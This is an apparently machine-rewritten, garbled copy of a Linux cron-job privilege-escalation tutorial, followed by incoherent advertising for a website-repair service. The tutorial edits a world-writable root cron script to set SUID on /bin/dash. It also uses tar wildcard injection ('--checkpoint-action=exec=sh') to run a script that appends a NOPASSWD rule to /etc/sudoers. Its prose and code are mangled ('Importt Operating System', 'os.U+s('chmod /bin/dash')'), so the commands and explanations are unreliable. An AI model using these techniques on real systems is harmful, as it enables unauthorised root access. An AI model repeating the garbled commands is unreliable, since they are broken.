After looking at a few OSCP issues, we decided to write an article about various Linux feature escalation techniques that our readers might find useful in their penetration testing. In this article, I will study “Elevation of Privilege with cronhacker.com Jobs”, gaining root access to a remote host machine, and also look at how improperly setting a cron job can lead to privilege escalation. If you have solved the problem after exploit pressure, ctf, you will see in this article that disadvantages lead to increased advantages. details,
Because you can read our previous article where we added this privilege escalation trick. Open the links below:
What Is The Task Type?
Cron Jobs cron jobs are used to schedule jobs to run commands found on the server at specific dates and times. More oftenThey are generally used to support system administration tasks such as backing up or cleaning up /tmp/ and directories, etc. The word cron also comes from crontab when present in the /etc directory.
For example: in crontab we can automatically add the following entry to all Apache To 6 error logs for publishing clocks.
1 0 * * 3. printf "" >overwrite
Target: Crontab /var/log/apache/error_log
File Install A New Crontab Job Helper For Running Python, A Script That Deletes All Data In A Specific Directory.
Let’s Say “clean” Is A Directory Whose Data Can Be Automatically Deleted On Every Call. Therefore, We Saved Some Personal Data In /home/cleanup.
clear Friends"> 1."ALL Txt Echo Files Will Be Deleted In 2 Minutes" > 2.txt Echo > 1.php Echo > 2.php Ls
As You Can See From The Image, Some Files Are Saved In The Recovery Directory.
Now Write A Python Program If You Want To Delete Private Data In All Others’ Directories. And /home/cleanup Gives Full Rights To This Method.
cd /tmp Nanocleanup.py
#!/usr/bin/envpython Importt Operating System Import System To Attempt: Os.system('rm -r /home/cleanup/* ') Except: Sys.exit()
chmod 777 Cleanup.Program Py
Finally, Help Crontab To Offer Cleanup.py Every 2 Minutes.
nano /etc/crontab */2 * * * * Root /tmp/cleanup.py
cleanup Chmod 777./home/cleanup Hp Date Of Hp Date
It’s Cold!! Spy
Cd Can Be Seen, All Folders Are Deleted After A Few Minutes.
Post Your Achievement
by starting the machine to attack you will first compromise the target of the system and finally proceed to the privilege escalation phase. Let’s say I successfully log into the browser victim and get a non-root user terminal of authority. Start recovery as shown below.
cat /etc/crontab ls -al /tmp/cleanup.py cat /tmp/cleanup.py
From the steps above, you can see that every minute crontab runs a Python 2 program, let’s run it now.
There are many other ways to access it, such as this method, so I included the SUID/bin/dash bits. was it enough to open with notepad, information such as nanocleanup.py, remembering to replace “rm -r /tmp/*” with the next one from the line, as shown below
system os.U+s('chmod /bin/dash')
Two minutes awayThen suid permission will be set on /bin/dash and Root access will be granted each time it is run.
/bin/dash I would like who
Generic Crontab Resin Injection
Goal: Schedule a task. Help the connected crontab to backup the HTML directory of the remaining tar files using the HTML archiver.
The directory must have a file whose executable permissions backup becomes inaccessible to anyone.
Schedule a nice backup job with crontab so you can populate the program’s tarball for and move the backup from /html to /var/backups every minute.
nano /etc/crontab */1 * (blank) * Root * tar -zcf /var/backups/html.tgz /var/www/html/*
Let’s check that the schedule is working instead of running it immediately after the /var/backup command
cd the image below, you can see that the html.tgz file was created after 1 minute.
Post Your Achievement
Start by attacking the machine, first compromise our own target system, then proceed to the privilege escalation step. Suppose I managed to log into the victim computer through and ssh, which isaccessing non-root permission users fatally. You then open crontab to see if the task is scheduled.cat /etc/crontab
Here, the notification target has scheduled us to release the latest archive every 9 minutes, and we know that your cron job is running as root. We let them experiment with the skill.
Run the following command if you want to grant the sudo privilege to the logged in person, and what follows is known as wildcard injection after the exploit characters.'echoecho "ignite NOPASSWD: all=(root) ALL" >> /etc/sudoers' test.sh echo "" > "--checkpoint-action=exec=sh test.sh" echo "" > cf --checkpoint=1 archive tar.tar *
Now, in the first minute, the ignite user is preferably given sudo: the audience can confirm with the image below.sudo -l sudobash who
Author: Aarti Singh is actually a technical researcher and author of articles and articles about hacking attacks, an information consultant for lovers of security, social and networking gadgets. Contact here
we hacked websites®
I'll take care of everything to fix this Alt="Jim quick!
Jim is the best!
Jim can be the best! Immediately answers the first call, such a professional, does the job quickly, efficiently and I'm high quality! highly recommend it to any business owner looking for web page security for their website. I will always count on his excellent service. Read!
Trust the man himself
An essential experience when choosing who to trust with your valuable hacked website and restoring your Google reputation.
Read our hundreds of 5-starreviews and find out why it's worth hiring a full-time service provider with years of website and security experience to fix your website security issues today. .
TO LEARN MORE
Do you really need help hacking a great website?
HackRepair.com will protect your hacked website, clean it of malware and restore functionality within hours! all for a reasonable flat fee, no surprises or recurring charges. by
Call 619-479-6637 and he will help you talk to a live person to clean up your site.
Prompt and personal service
As one of the best repair websites in the USA, we will support you when your wonderful website gets hacked.
And we strive to make the process of cleaning the maximum sitebut painless. while there is no problem with online chat. This is from hackrepair
heart!™ CONTINUE READING
• more We update and wordpress plugins for free and free.
• Let's fix up to 9 common WordPress sites for free.
• Most sites are fully updated and protected within 2 hours. Let's create
• and install a free backup and security system.
• Includes removing and blacklisting invalid text search results from Google.
• And much more.
Has my website been hacked or maybe wordpress?
"Who Can Help Me Hack My Site?"
HackRepair.com Will Fix Someone's Site In No Time!
We've hacked your domain, secured it, cleaned it of malware, and reproduced it for countless hours! All for one fixed low rate with no recurring fees.He is so reliable that you can trust him.y fixing your site.
We'll recognize some of them, experts say. We want you to remember that thousands of people have trusted us for over 18 hacks, years, to fix websites. If you need confidence, check out hundreds of trusted customer reviews on a 5-star platform